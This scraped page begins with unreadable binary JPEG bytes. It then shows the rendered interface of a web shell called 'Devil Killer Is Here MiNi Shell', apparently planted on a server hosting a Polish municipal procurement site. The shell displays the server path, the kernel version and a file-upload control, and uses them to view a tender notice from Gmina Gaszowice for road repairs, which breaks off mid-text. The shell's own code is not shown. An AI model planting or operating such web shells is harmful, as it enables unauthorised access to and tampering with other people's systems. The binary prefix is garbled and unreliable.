JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240808/0045071101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont dróg gminnych w Gminie Gaszowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gaszowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258753</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rydułtowska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gaszowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-293</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@gaszowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gaszowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont dróg gminnych w Gminie Gaszowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4a36c57-551b-4419-8415-b7be312eed5a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00450711</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00043331/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont dróg gminnych w Gminie Gaszowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.gaszowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.gaszowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. stały dostęp do sieci Internet i<br/>minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s;<br/>2. zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze;<br/>3. system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14 i późniejsze, dystrybucje systemu Linux.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przebudowa ul. Leśnej w Szczerbicach<br/>W ramach zamierzenia inwestycyjnego przewiduje się przebudowę drogi gminnej ul. Leśnej w Szczerbicach. Do przebudowy przeznaczony jest odcinek o łącznej długości 362,23 mb. <br/>Zakres obejmuje:<br/>- warstwa ścieralna z betonu asfaltowego AC 11S 50/70 o grubości 4 cm,<br/>- warstwa wiążąca z betonu asfaltowego AC 16W 50/70 o grubości 5 cm,<br/>- podbudowa zasadnicza z mieszanki niezwiązanej z kruszywem C90/3 z kruszywa łamanego niesortowanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm.<br/>- krawężniki najazdowe przy zjazdach indywidualnych i korytko ściekowe betonowe zabudować bezpośrednio na wilgotnym, świeżym i niestężonym betonie o grubości ławy i oporu 15 cm, beton klasy C 12/15.<br/>- zjazdy należy wykonać z kruszywa łamanego niesortowanego 0/31,5 mm o gr. 20 cm lub przebrukować, jeżeli są wykonane z kostki betonowej w stanie istniejącym i jest to konieczne.<br/>- obustronne pobocze należy wykonać z destruktu asfaltowego o gr. 10 cm.<br/>2) Remont ul. Radoszowskiej w Szczerbicach<br/>W ramach zamierzenia inwestycyjnego przewiduje się remont drogi gminnej ul. Radoszowskiej w Szczerbicach w na odcinku o długości 520 mb.<br/>	W ramach zadania realizowany będzie etap I obejmujący odcinek KM od 0,00 do 0+520,00<br/>	Zakres obejmuje wykonanie:<br/>- warstwa ścieralna z betonu asfaltowego AC 11S 50/70 o grubości 4 cm,<br/>- warstwa wiążąca z betonu asfaltowego AC 16W 50/70 o grubości 5 cm,<br/>- podbudowa zasadnicza z mieszanki niezwiązanej z kruszywem C90/3 z kruszywa łamanego niesortowanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm,<br/>- warstwa mrozoochronna z mieszanki niezwiązanej lub gruntu niewysadzinowego (naturalnego lub antropogenicznego) o CBR ≥ 25% o gr. 30 cm,<br/>- warstwa wzmacniająca z geowłókniny o szerokości 5,00 m.<br/>- Krawężniki najazdowe przy zjazdach indywidualnych zabudować bezpośrednio na wilgotnym, świeżym i niestężonym betonie o grubości ławy i oporu 15 cm, beton klasy C 12/15.<br/>- zjazdy należy wykonać z kruszywa łamanego niesortowanego 0/31,5 mm o gr. 20 cm lub przebrukować, jeżeli są wykonane z kostki betonowej w stanie istniejącym.<br/>- obustronne pobocze należy wykonać z destruktu asfaltowego o gr. 10 cm.<br/>3)	Remont ul. Kolejowej w Łukowie Śląskim i Gaszowicach<br/>W ramach zamierzenia inwestycyjnego przewiduje się remont drogi gminnej ul. Kolejowej w Gaszowicach i Łukowie Śląskim na odcinku o długości 313 mb.<br/>W ramach zadania realizowany będzie etap I obejmujący odcinek KM od 0,00 do 0+313,00<br/>Zakres obejmuje wykonanie:<br/>a)	Konstrukcja K1:<br/>- warstwa ścieralna z betonu asfaltowego AC 11S 50/70 o grubości 4 cm,<br/>- warstwa wiążąca z betonu asfaltowego AC 16W 50/70 o grubości 5 cm,<br/>- podbudowa zasadnicza z mieszanki niezwiązanej z kruszywem C90/3 z kruszywa łamanego niesortowanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm,<br/>- warstwa mrozoochronna z mieszanki niezwiązanej lub gruntu niewysadzinowego (naturalnego lub antropogenicznego) o CBR ≥ 25% o grubości 40 cm.<br/>b)	Konstrukcja K2:<br/>- warstwa ścieralna z betonu asfaltowego AC 11S 50/70 o grubości 4 cm,<br/>- warstwa wiążąca z betonu asfaltowego AC 16W 50/70 o grubości 5 cm,<br/>- podbudowa zasadnicza z mieszanki niezwiązanej z kruszywem C90/3 z kruszywa łamanego niesortowanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm,<br/>- warstwa mrozoochronna z mieszanki niezwiązanej lub gruntu niewysadzinowego (naturalnego lub antropogenicznego) o CBR ≥ 25% o grubości 55 cm.<br/>c)	Krawężniki najazdowe przy zjazdach indywidualnych zabudować bezpośrednio na wilgotnym, świeżym i niestężonym betonie o grubości ławy i oporu 15 cm, beton klasy C 12/15.<br/>d)	Zjazdy należy wykonać z kruszywa łamanego niesortowanego 0/31,5 mm o gr. 20 cm lub przebrukować, jeżeli są wykonane z kostki betonowej w stanie istniejącym.<br/>e)	Obustronne pobocze należy wykonać z destruktu asfaltowego o gr. 10 cm.<br/>4)	Remont ul. Biskupa w Czernicy<br/>W ramach zamierzenia inwestycyjnego przewiduje się remont drogi gminnej ul. Biskupa w Czernicy. Remontowana droga podzielona została na dwa odcinki o łącznej długości 774,72 mb. Początek opracowania I odcinka znajduje się na skrzyżowaniu ul. Biskupa z ul. Wąwozową. Koniec odcinka nr I ma miejsce przed wiaduktem kolejowym, w pobliżu działki nr 33. Odcinek II ma swój początek za ww. wiaduktem w pobliżu działki nr 2453/496, a koniec na skrzyżowaniu ul. Biskupa z jezdnią o nawierzchni gruntowej, stanowiącą przedłużenie ul. Rydułtowskiej. Długość remontowanych odcinków drogi: odcinek I: 429,10 mb, odcinek II: 345,62 mb.<br/>Zakres obejmuje wykonanie:<br/>- warstwa ścieralna z betonu asfaltowego AC 11S 50/70 o grubości 4 cm,<br/>- warstwa wiążąca z betonu asfaltowego AC 16W 50/70 o grubości 5 cm,<br/>- podbudowa zasadnicza z mieszanki niezwiązanej z kruszywem C90/3 z kruszywa łamanego niesortowanego 0/31,5 mm stabilizowanego mechanicznie o grubości 20 cm,<br/>- warstwa mrozoochronna z mieszanki niezwiązanej lub gruntu niewysadzinowego (naturalnego lub antropogenicznego) o CBR ≥ 25% o gr. 30 cm,<br/>- warstwa wzmacniająca z geowłókniny o szerokości 5,00 m.<br/>- krawężniki najazdowe przy zjazdach indywidualnych zabudować bezpośrednio na wilgotnym, świeżym i niestężonym betonie o grubości ławy i oporu 15 cm, beton klasy C 12/15.<br/>- zjazdy należy wykonać z kruszywa łamanego niesortowanego 0/31,5 mm o gr. 20 cm lub przebrukować, jeżeli są wykonane z kostki betonowej w stanie istniejącym.<br/>- obustronne pobocze należy wykonać z destruktu asfaltowego o gr. 10 cm.<br/>5)	Remont nawierzchni ul. Jana w Łukowie Śląskim<br/>W ramach zamierzenia inwestycyjnego przewiduje się remont nawierzchni drogi gminnej ul. Jana w Łukowie Śląskim na odcinku o długości 280 mb.<br/>W ramach zadania realizowany będzie etap II obejmujący odcinek KM od 0+0,035 do 0+315,00. <br/>Zadanie nie obejmuje remontu skrzyżowania z drogą powiatową – ul. Wolności.<br/>Zakres obejmuje wykonanie:<br/>- odcinek od km 0+035 do km 0+315 – droga wewnętrzna klasy D o natężeniu ruchem KR2 szerokość 2,80 ÷ 4,00 m, nawierzchnia mineralno asfaltowa AC11S grubości 5 cm, <br/>- pobocze szerokości 0,75 m, <br/>- odwodnienie: poprzez nadanie spadku podłużnego i poprzecznego, spadek poprzeczny od 0 ÷ 2%. <br/>- ograniczenie nawierzchni: ulica Jana: - brak ograniczenia krawężnikiem, <br/>- zjazdy do posesji (od strony jezdni): krawężnikiem 15 x 22 cm najazdowym wystającym 4 cm ponad nawierzchnię ul. Jana, posadowionych na ławie betonowej z oporem. Ława wykonana z betonu C12/15 (B-15). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) dotyczące zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa tego warunku udziału w postępowaniu.<br/>2) dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa tego warunku udziału w postępowaniu.<br/>3) dotyczące sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa tego warunku udziału w postępowaniu.<br/>4) dotyczące zdolności technicznej lub zawodowej:<br/>a) wykonanych robót:<br/>Należy złożyć wykaz robót budowlanych (załącznik nr 4 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o<br/>tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:<br/>Wymagane jest wykazanie przez wykonawcę realizacji:<br/>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej dwóch (2) zamówień obejmujących wykonanie robót<br/>budowlanych związanych z budową, przebudową lub remontem dróg publicznych o wartości nie mniejszej niż 1 000 000,00 zł brutto każda<br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.<br/>Dowodami są referencje oraz inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.<br/><br/>b) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego:<br/>Należy złożyć wykaz osób (załącznik nr 3 do SWZ), które będą uczestniczyć w wykonywaniu zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w osobą;<br/>- Kierownikiem budowy - Zamawiający wymaga, aby osoba wskazana na to stanowisko posiadała min. 3 letnie doświadczenie, licząc od daty uzyskania uprawnień budowlanych, uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej wraz z aktualnym wpisem do Izby Inżynierów Budownictwa.<br/><br/>Dla wykazanej osoby należy złożyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależą do właściwej izby samorządu zawodowego jeżeli taki wymóg na te osoby nakłada Prawo budowlane - na załączniku nr 3.<br/>Zgodnie z art. 12a Prawa budowlanego, który to odsyła do ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 22 grudnia 2015 r. ( t.j. Dz. U. z 2023 r. poz. 334) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależności do izby samorządu zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej (załącznik nr 5 do SWZ),<br/>b) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej (KRS, CEIDG).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych<br/>(załącznik nr 4 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone.<br/>b) wykaz osób (załącznik nr 3 do SWZ), które będą uczestniczyć w wykonywaniu zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Ofertę należy sporządzić na druku „Formularz oferty”, który stanowi załącznik nr 1 do SWZ<br/>oraz załączyć do niego wymagane dokumenty i oświadczenia zgodnie z niniejszą SWZ.<br/>2) Wykonawca dołącza do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu<br/>oświadczenie, o którym mowa w art. 125 ust. 1 Pzp tj. o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunków udziału w postępowaniu<br/>3) Samooczyszczenie- w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 i 6 lub art. 109<br/>ust. 1 pkt 2-10 ustawy Pzp, wykonawca nie podlega wykluczeniu<br/>4) Pełnomocnictwo<br/>5) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>6) Zobowiązanie podmiotu trzeciego (załącznik nr 9 do SWZ)<br/>7) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.1. Oferta musi być zabezpieczona wadium w wysokości 40.000,00 zł.<br/>1.2. Termin wniesienia wadium upływa dnia 3.09.2024 r. do godz. 12.00.<br/>1.3. Wadium musi obejmować cały okres związania ofertą.<br/>1.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach 